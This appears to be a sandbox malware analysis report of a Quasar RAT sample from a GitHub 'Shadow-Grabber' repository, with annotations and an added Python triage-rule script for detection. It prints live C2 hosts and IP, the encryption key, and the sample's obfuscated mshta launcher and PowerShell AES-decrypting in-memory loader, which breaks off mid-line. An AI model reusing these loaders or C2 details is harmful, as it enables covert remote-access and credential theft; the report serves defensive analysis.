Resubmissions
30-06-2024 20:33  240630-zb2tcsxhrk  7
30-06-2024 20:26  240630-y78q4svarb  10
30-06-2024 20:25  240630-y7p9rsxgjm  1

Analysis
max time kernel: 217s
max time network: 246s
platform: windows11-21h2_x64
resource: win11-20240611-en
resource tags: arch:x64, arch:x86, image:win11-20240611-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 30-06-2024 20:26
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://github.com/Excalisz/Shadow-Grabber-
Resource: win11-20240611-en

General
Target: https://github.com/Excalisz/Shadow-Grabber-
Malware Config
Extracted
family: quasar
1.0.0.0
v2.2.6 | Tinsler
C2:
  throbbing-mountain-09011.pktriot.net:22112
  167.71.56.116:22112
  throbbing-mountain-09011.pktriot.net:5050
cf16a257-7d89-4296-8384-8fca3dbb568f
encryption_key: 045F98A287DD47B8B5C074D234995A2C5A913042
install_name: .exe
log_directory: $sxr-Logs
reconnect_delay: 1000

The pktriot.net name is a Packetriot tunnel hostname and the raw IP is listed with the same port 22112, so both the hostname and the IP belong on the block list; the $sxr- prefix of the log directory is the same naming scheme used for every dropped file, scheduled task and environment variable in this analysis.
Signatures

Quasar payload (1 IoC)
  resource: behavioral1/memory/4976-619-0x000001B3429E0000-0x000001B3431AA000-memory.dmp
  yara_rule: family_quasar
  PID 4976 is $sxr-powershell.exe (see "Executes dropped EXE"), so the Quasar RAT runs as an in-memory .NET assembly inside the renamed PowerShell host, matching the Assembly.Load loader visible in the $sxr-powershell.exe command line in the process tree.
Suspicious use of NtCreateProcessExOtherParentProcess (3 IoCs)
  creator PID / process    assigned parent
  6740 WerFault.exe        6604 dllhost.exe
  7116 WerFault.exe        7008 dllhost.exe
  2328 WerFault.exe        6108 dllhost.exe
  These are the crash handlers for the three dllhost.exe instances that crash (WerFault.exe -p 6604 / 7008 / 6108 in the process tree): normal Windows Error Reporting behaviour, not attacker tooling.
Suspicious use of NtCreateUserProcessOtherParentProcess (15 IoCs)
  creator PID / process          assigned parent
  4820 Shadow-Stealer.bat.exe    628 winlogon.exe   (2 entries)
  4976 $sxr-powershell.exe       628 winlogon.exe   (7 entries)
  5832 Shadow-Stealer.bat.exe    628 winlogon.exe   (2 entries)
  6676 svchost.exe               6604, 7008, 6108, 6260 dllhost.exe   (4 entries)
  The first three rows are parent-PID spoofing: the loader starts its dllhost.exe surrogates with winlogon.exe (PID 628) as their parent, which is why every dllhost.exe /Processid:{...} in the process tree hangs off winlogon.exe rather than off the PowerShell host that created it. The svchost.exe rows reference only dllhost PIDs that subsequently crash (compare "Program crash" and the WerFault rows), so they are most plausibly crash handling rather than loader activity.
Executes dropped EXE (7 IoCs)
  4820 Shadow-Stealer.bat.exe
  2536 $sxr-mshta.exe
  3944 $sxr-cmd.exe
  4976 $sxr-powershell.exe
  3832 $sxr-powershell.exe
  5832 Shadow-Stealer.bat.exe
  6452 Shadow-Stealer.bat.exe
  $sxr-cmd.exe and $sxr-powershell.exe accept cmd.exe and powershell.exe switches in the process tree below, so they are renamed copies of those binaries dropped into C:\Windows (see "Drops file in Windows directory"). Shadow-Stealer.bat.exe shows the same behaviour as $sxr-powershell.exe (spoofed winlogon parent, SetThreadContext on dllhost.exe, SeDebugPrivilege), consistent with the same host binary running under the batch file's name.
Hide Artifacts: Hidden Window (1 TTP, 4 IoCs)
Windows that would typically be displayed when an application carries out an operation can be hidden.
  4976 $sxr-powershell.exe
  3832 $sxr-powershell.exe
  5684 $sxr-powershell.exe
  1504 $sxr-powershell.exe
  This corresponds to the -WindowStyle hidden switch on the $sxr-powershell.exe command line.
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
  flow 1   raw.githubusercontent.com
  flow 12  raw.githubusercontent.com
  flow 33  raw.githubusercontent.com
Drops file in System32 directory (5 IoCs)
  svchost.exe  File opened for modification  C:\Windows\System32\Tasks\$sxr-tjptoUybjVuvgCOJtIWn
  svchost.exe  File opened for modification  C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx
  svchost.exe  File opened for modification  C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx
  svchost.exe  File opened for modification  C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx
  svchost.exe  File opened for modification  C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx
  The Tasks entry is the Task Scheduler service (svchost.exe -k netsvcs -s Schedule in the process tree) writing the definition of a scheduled task named $sxr-tjptoUybjVuvgCOJtIWn; that task is the persistence mechanism and is the parent of $sxr-mshta.exe below. The .evtx entries are ordinary event-log writes and carry no signal on their own.
Suspicious use of SetThreadContext (22 IoCs)
  source PID / process          target PIDs (all dllhost.exe)
  4820 Shadow-Stealer.bat.exe   3408, 996, 4000, 2316
  4976 $sxr-powershell.exe      4088, 248, 4700, 5564, 5384, 6552, 6604, 6968, 7008, 5572, 6108, 6260, 5232, 6992
  5832 Shadow-Stealer.bat.exe   5812, 5920, 6460, 6656
  Each target is a freshly started dllhost.exe whose thread context is rewritten by the loader: the process-hollowing pattern. Several of the targets (6604, 7008, 6108, 6260) crash afterwards (see "Program crash"), which is what produces the WerFault.exe rows elsewhere in this report.
Drops file in Windows directory (12 IoCs)
  Shadow-Stealer.bat.exe  File created (2), File opened for modification (2)  C:\Windows\$sxr-mshta.exe
  Shadow-Stealer.bat.exe  File created (2), File opened for modification (2)  C:\Windows\$sxr-cmd.exe
  Shadow-Stealer.bat.exe  File created (2), File opened for modification (2)  C:\Windows\$sxr-powershell.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Program crash (2 IoCs)
  6088 WerFault.exe  crashed process: 6260 dllhost.exe
  5136 WerFault.exe  crashed process: 6056 dllhost.exe
Checks processor information in registry (2 TTPs, 30 IoCs)
Processor information is often read in order to detect sandboxing environments.
  WerFault.exe (28 entries): Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0; Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier, Identifier, ProcessorNameString, ~MHz, Update Revision and Platform Specific Field 1
  svchost.exe (2 entries): Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0; Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  All of these reads come from WerFault.exe collecting crash-report data for the crashed dllhost.exe instances and from a service host, not from the loader or the Quasar payload, so the generic sandbox-detection description does not apply to this sample.
Enumerates system info in registry (2 TTPs, 11 IoCs)
  WerFault.exe (8 entries): Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS (4); Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (4)
  msedge.exe (3 entries): Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS; Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer and \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
  Same caveat as above: crash reporting and the browser, not the sample.
Kills process with taskkill (3 IoCs)
  5040 taskkill.exe
  2680 taskkill.exe
  6564 taskkill.exe
Explorer.EXE writes Internet Explorer toolbar keys (4 IoCs)
  Key created       \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar  Explorer.EXE
  Set value (int)   \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"  Explorer.EXE
  Key created       \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser  Explorer.EXE
  Set value (data)  \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  Explorer.EXE
  Shell UI state written by Explorer while the Downloads folder was being browsed; not sample activity.
Modifies registry class (24 IoCs)
  (HKU_Classes below stands for \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes)
  Key created       HKU_Classes\Local Settings  msedge.exe
  Key created       HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0  Explorer.EXE
  Set value (data)  HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02  Explorer.EXE
  Set value (int)   HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"  Explorer.EXE
  Set value (data)  HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff  Explorer.EXE
  Key created       HKU_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders  Explorer.EXE
  Key created       HKU_Classes\NotificationData  Explorer.EXE
  Key created       HKU_Classes\Local Settings\MuiCache  MiniSearchHost.exe
  Key created       HKU_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\  Explorer.EXE
  Set value (data)  HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff  Explorer.EXE
  Key created       HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell  Explorer.EXE
  Set value (str)   HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"  Explorer.EXE
  Set value (data)  HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000  Explorer.EXE
  Key created       HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU  Explorer.EXE
  Set value (data)  HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots  Explorer.EXE
  Key created       HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0  Explorer.EXE
  Set value (data)  HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff  Explorer.EXE
  Key created       HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags  Explorer.EXE
  Set value (str)   HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads"  Explorer.EXE
  Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\  $sxr-mshta.exe
  Set value (data)  HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe11000000f027567846bcda01e60448172ccbda01af8e84182ccbda0114000000  Explorer.EXE
  Key created       HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1  Explorer.EXE
  Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\  Explorer.EXE
  Set value (data)  HKU_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff  Explorer.EXE
  Only the \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-...}\Instance\ row comes from a sample process ($sxr-mshta.exe); the rest is Explorer shell-bag and browser housekeeping from opening the Downloads folder.
NTFS ADS (4 IoCs)
  msedge.exe  File opened for modification  C:\Users\Admin\Downloads\Unconfirmed 773041.crdownload:SmartScreen
  msedge.exe  File opened for modification  C:\Users\Admin\Downloads\Shadow-Stealer.bat:Zone.Identifier
  msedge.exe  File opened for modification  C:\Users\Admin\Downloads\Unconfirmed 690217.crdownload:SmartScreen
  msedge.exe  File opened for modification  C:\Users\Admin\Downloads\Shadow-Stealer.bat:Zone.Identifier
  Edge writing the Zone.Identifier (Mark-of-the-Web) stream on the downloaded Shadow-Stealer.bat: the batch file was fetched through the browser from the GitHub target, twice (one .crdownload per attempt).
Runs ping.exe (1 TTP, 3 IoCs)
  6104 PING.EXE
  3744 PING.EXE
  3948 PING.EXE
  Batch droppers commonly use ping as a sleep; the report does not show the arguments, so treat this as a timing hint rather than network activity.
Suspicious behavior: AddClipboardFormatListener (1 IoC)
  3336 Explorer.EXE
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  By process (hits): 3268 msedge.exe (2), 2044 msedge.exe (2), 4892 identity_helper.exe (2), 4976 msedge.exe (2), 4888 msedge.exe (2), 4820 Shadow-Stealer.bat.exe (5), 1776 msedge.exe (4), 3408 dllhost.exe (4), 996 dllhost.exe (4), 4976 $sxr-powershell.exe (8), 3832 $sxr-powershell.exe (3), 4088 dllhost.exe (4), 248 dllhost.exe (4), 4700 dllhost.exe (12), 5564 dllhost.exe (6)
  PID 4976 appears both as msedge.exe and as $sxr-powershell.exe: the sandbox reused the PID after the Edge child exited, so pivot on image name and start time rather than PID alone when following this report.
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (10 IoCs)
  2044 msedge.exe (all 10 entries)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Token: SeDebugPrivilege  4820 Shadow-Stealer.bat.exe (2), 3408 dllhost.exe, 996 dllhost.exe, 4976 $sxr-powershell.exe (3), 4088 dllhost.exe, 248 dllhost.exe, 3832 $sxr-powershell.exe, 4700 dllhost.exe, 5564 dllhost.exe
  Token: SeShutdownPrivilege, SeCreatePagefilePrivilege  428 dwm.exe
  Token: 50 entries from 2656 svchost.exe cycling through SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
  The SeDebugPrivilege rows are the ones that matter: the loader (Shadow-Stealer.bat.exe, $sxr-powershell.exe) and each hollowed dllhost.exe enable it, consistent with the cross-process SetThreadContext calls recorded above. The dwm.exe and svchost.exe rows are routine.
Suspicious use of FindShellTrayWindow (45 IoCs)
  2044 msedge.exe (all 45 entries)
Suspicious use of SendNotifyMessage (12 IoCs)
  2044 msedge.exe (all 12 entries)
Suspicious use of SetWindowsHookEx (5 IoCs)
  3604 MiniSearchHost.exe
  4976 $sxr-powershell.exe
  3336 Explorer.EXE (3)
Suspicious use of UnmapMainImage (1 IoC)
  3336 Explorer.EXE
Suspicious use of WriteProcessMemory (64 IoCs)
  All 64 entries: PID 2044 msedge.exe wrote to memory of its msedge.exe children 2808, 860, 3268 and 4848.
  Browser noise: the Edge broker process writing into its own renderer and utility children, unrelated to the sample.
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
  See the $sxr-tjptoUybjVuvgCOJtIWn task file under C:\Windows\System32\Tasks in "Drops file in System32 directory".
Views/modifies file attributes (1 TTP, 3 IoCs)
  6988 attrib.exe
  4968 attrib.exe
  4360 attrib.exe
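The behaviours catalogued above (renamed copies of mshta/cmd/powershell in C:\Windows, children created with winlogon.exe as a spoofed parent, SetThreadContext on dllhost.exe, executables written into the Windows directory) can be turned into triage rules. The Python below is an added example and is not code from this report or from the Shadow-Grabber project. Its event records are constructed by hand from the PIDs and image names in the tables above, using this example's own field names (kind, pid, image, parent_pid, target_image, original_file_name, path), loosely modelled on Sysmon process-create fields; the OriginalFileName values are the PE version-info names Sysmon reports for the three real binaries.

```python
"""Triage rules for the behaviours in the signatures above (added example).

SAMPLE_EVENTS is constructed from the report's PIDs and image names; it is
not a real log export, and the field names are this example's own schema.
"""
import ntpath

# PE OriginalFileName (as Sysmon reports it) for the three binaries the sample
# copies into C:\Windows under new names.
LOLBIN_ORIGINAL_NAMES = {
    "powershell.exe": "PowerShell.EXE",
    "cmd.exe": "Cmd.Exe",
    "mshta.exe": "MSHTA.EXE",
}
# Creators that legitimately start children under another parent: Windows
# Error Reporting (the WerFault.exe rows above) and service hosts.
PPID_SPOOF_ALLOWLIST = {"werfault.exe", "svchost.exe"}
WINDOWS_ROOT = r"c:\windows"

SAMPLE_EVENTS = [  # constructed from the report; 1111 is a benign control
    {"kind": "process_start", "pid": 2536, "image": r"C:\Windows\$sxr-mshta.exe",
     "original_file_name": "MSHTA.EXE"},
    {"kind": "process_start", "pid": 3944, "image": r"C:\Windows\$sxr-cmd.exe",
     "original_file_name": "Cmd.Exe"},
    {"kind": "process_start", "pid": 4976, "image": r"C:\Windows\$sxr-powershell.exe",
     "original_file_name": "PowerShell.EXE"},
    {"kind": "process_start", "pid": 1111,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_file_name": "PowerShell.EXE"},
    # "create": a child started with an explicitly assigned parent (creator != parent)
    {"kind": "create", "pid": 4820, "image": "Shadow-Stealer.bat.exe",
     "parent_pid": 628, "parent_image": "winlogon.exe"},
    {"kind": "create", "pid": 4976, "image": "$sxr-powershell.exe",
     "parent_pid": 628, "parent_image": "winlogon.exe"},
    {"kind": "create", "pid": 6740, "image": "WerFault.exe",
     "parent_pid": 6604, "parent_image": "dllhost.exe"},
    {"kind": "create", "pid": 6676, "image": "svchost.exe",
     "parent_pid": 6604, "parent_image": "dllhost.exe"},
    {"kind": "set_thread_context", "pid": 4976, "image": "$sxr-powershell.exe",
     "target_pid": 4088, "target_image": "dllhost.exe"},
    {"kind": "file_create", "pid": 4820, "image": "Shadow-Stealer.bat.exe",
     "path": r"C:\Windows\$sxr-mshta.exe"},
]


def _base(image: str) -> str:
    return ntpath.basename(image).lower()


def rule_renamed_lolbin(ev: dict):
    """Image name disagrees with the PE OriginalFileName of a known LOLBin."""
    if ev["kind"] != "process_start":
        return None
    actual = _base(ev["image"])
    for real_name, orig in LOLBIN_ORIGINAL_NAMES.items():
        if ev.get("original_file_name", "").lower() == orig.lower() and actual != real_name:
            return f"{actual} is a renamed copy of {real_name} (OriginalFileName={orig})"
    return None


def rule_ppid_spoof(ev: dict):
    """Every 'create' event is a child parented elsewhere; allowlist known-benign creators."""
    if ev["kind"] != "create" or _base(ev["image"]) in PPID_SPOOF_ALLOWLIST:
        return None
    return f"child parented to {ev['parent_image']} (PID {ev['parent_pid']}) instead of the creator"


def rule_thread_context_hijack(ev: dict):
    """SetThreadContext from another image into a dllhost.exe surrogate (hollowing)."""
    if ev["kind"] != "set_thread_context":
        return None
    if _base(ev["target_image"]) == "dllhost.exe" and _base(ev["image"]) != "dllhost.exe":
        return f"rewrote thread context of dllhost.exe PID {ev['target_pid']}"
    return None


def rule_exe_dropped_in_windows_root(ev: dict):
    """An executable written directly into C:\\Windows, not into a subdirectory."""
    if ev["kind"] != "file_create":
        return None
    path = ev["path"].lower()
    if ntpath.dirname(path) == WINDOWS_ROOT and path.endswith(".exe"):
        return f"dropped {ev['path']}"
    return None


RULES = {
    "renamed_lolbin": rule_renamed_lolbin,
    "ppid_spoof": rule_ppid_spoof,
    "thread_context_hijack": rule_thread_context_hijack,
    "exe_dropped_in_windows_root": rule_exe_dropped_in_windows_root,
}


def triage(events: list) -> list:
    """Run every rule over every event; return one alert dict per hit."""
    alerts = []
    for ev in events:
        for name, rule in RULES.items():
            detail = rule(ev)
            if detail:
                alerts.append({"rule": name, "pid": ev["pid"], "image": ev["image"], "detail": detail})
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"[{a['rule']}] PID {a['pid']} {a['image']}: {a['detail']}")
```

Two caveats when moving this to production telemetry. Sysmon's process-create event records only the parent the kernel was told about, so the winlogon.exe rows here would look like legitimate winlogon children; catching parent-PID spoofing needs a source that records the actual caller (ETW process-create provider or an EDR), or a correlation between the reported parent and the process that did the earlier handle opens. The OriginalFileName comparison is the robust part: a renamed powershell.exe still carries "PowerShell.EXE" in its version resource regardless of the name on disk.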
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{982b105d-4ff0-4db4-a092-125e0fff31ae}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{45e7c5c1-0501-463d-b264-506e3109e924}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1a775a46-a247-49d4-9ba2-7f91c8e9fc08}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{661e236f-9f3e-4c55-acc3-6cb777eba59f}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{258100b7-590c-45e1-9f1b-05a1c6485a55}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{78f4b273-37ea-41f2-86d0-e83ef596b666}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6604 -s 4083⤵
- Checks processor information in registry
- Enumerates system info in registry
- C:\Windows\System32\dllhost.exe (tree depth 2)
  cmdline: C:\Windows\System32\dllhost.exe /Processid:{956d5857-ba7a-4a6a-8372-f0d36493aae1}
- C:\Windows\system32\WerFault.exe (tree depth 3)
  cmdline: C:\Windows\system32\WerFault.exe -u -p 7008 -s 412
  - Checks processor information in registry
  - Enumerates system info in registry
- C:\Windows\System32\dllhost.exe (tree depth 2)
  cmdline: C:\Windows\System32\dllhost.exe /Processid:{41fc4822-883b-4647-a525-3bfa5b979065}
- C:\Windows\system32\WerFault.exe (tree depth 3)
  cmdline: C:\Windows\system32\WerFault.exe -u -p 6108 -s 324
  - Checks processor information in registry
  - Enumerates system info in registry
- C:\Windows\System32\dllhost.exe (tree depth 2)
  cmdline: C:\Windows\System32\dllhost.exe /Processid:{291a6aad-4c19-4509-aa22-215d2fedec93}
- C:\Windows\System32\dllhost.exe (tree depth 2)
  cmdline: C:\Windows\System32\dllhost.exe /Processid:{6bb535ad-cefe-4bc5-9c63-23542c75d01f}
- C:\Windows\System32\dllhost.exe (tree depth 2)
  cmdline: C:\Windows\System32\dllhost.exe /Processid:{d5cc7e19-4999-4667-afc2-4b66c3b01c83}
- C:\Windows\System32\dllhost.exe (tree depth 2)
  cmdline: C:\Windows\System32\dllhost.exe /Processid:{1608d58a-4a0a-4640-9fba-0cd4fc83ea65}
- C:\Windows\System32\dllhost.exe (tree depth 2)
  cmdline: C:\Windows\System32\dllhost.exe /Processid:{8e6a81c5-4614-42f6-aac5-cef00bfb1d4d}
- C:\Windows\System32\dllhost.exe (tree depth 2)
  cmdline: C:\Windows\System32\dllhost.exe /Processid:{643f90f6-a869-4348-9d8b-aa97d0cf3f53}
- C:\Windows\System32\dllhost.exe (tree depth 2)
  cmdline: C:\Windows\System32\dllhost.exe /Processid:{02a52147-4897-4812-a6c0-a21132193c94}
- C:\Windows\System32\dllhost.exe (tree depth 2)
  cmdline: C:\Windows\System32\dllhost.exe /Processid:{3db540ea-bb6a-4512-bfe8-1a68b03fc925}
- C:\Windows\system32\lsass.exe (tree depth 1)
  cmdline: C:\Windows\system32\lsass.exe
- C:\Windows\system32\svchost.exe (tree depth 1)
  cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- C:\Windows\System32\svchost.exe (tree depth 1)
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- C:\Windows\system32\svchost.exe (tree depth 1)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- C:\Windows\System32\svchost.exe (tree depth 1)
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\system32\svchost.exe (tree depth 1)
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- C:\Windows\system32\svchost.exe (tree depth 1)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  - Drops file in System32 directory
- C:\Windows\$sxr-mshta.exe (tree depth 2)
  cmdline: C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
  - Executes dropped EXE
  - Modifies registry class
- C:\Windows\$sxr-cmd.exe (tree depth 3)
  cmdline: "C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%
  - Executes dropped EXE
- C:\Windows\System32\Conhost.exe (tree depth 4)
  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = 
